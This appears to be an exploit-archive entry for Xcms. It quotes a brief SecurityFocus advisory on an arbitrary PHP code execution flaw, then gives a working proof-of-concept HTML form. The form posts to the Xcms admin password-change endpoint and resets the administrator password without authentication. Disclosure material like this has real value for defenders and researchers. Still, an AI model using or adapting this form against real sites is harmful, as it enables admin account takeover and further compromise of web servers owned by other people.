25 lines
No EOL
1.1 KiB
HTML
25 lines
No EOL
1.1 KiB
HTML
source: https://www.securityfocus.com/bid/25771/info
|
|
|
|
Xcms is prone to a vulnerability that lets attackers execute arbitrary PHP code because the application fails to properly sanitize user-supplied input.
|
|
|
|
An attacker can exploit this issue to execute arbitrary malicious PHP code in the context of the webserver process. This may help the attacker compromise the application and the underlying system; other attacks are also possible.
|
|
|
|
<html>
|
|
<head>
|
|
<title>-XCMS Arbitrary Command Execution Vuln by x0kster -</title>
|
|
</head>
|
|
<body>
|
|
<pre>
|
|
- [XCMS All Version Arbitrary Command Execution Vulnerability ] -
|
|
- [Bug found by x0kster - x0kster (at) gmail (dot) com [email concealed] ] -
|
|
</pre>
|
|
<form name="pass" method="post" action="http://www.xcms.it/index.php?lng=it&pg=admin&s=cpass">
|
|
<input type="hidden" name="pass" value="1190316852" />
|
|
<pre>
|
|
Password : <input type="password" size="20" name="password_1190316852" />
|
|
Repete password : <input type="password" size="20" name="rpassword_1190316852" />
|
|
<input type="submit" value="Modifica Password" />
|
|
</pre>
|
|
</form>
|
|
</body>
|
|
</html> |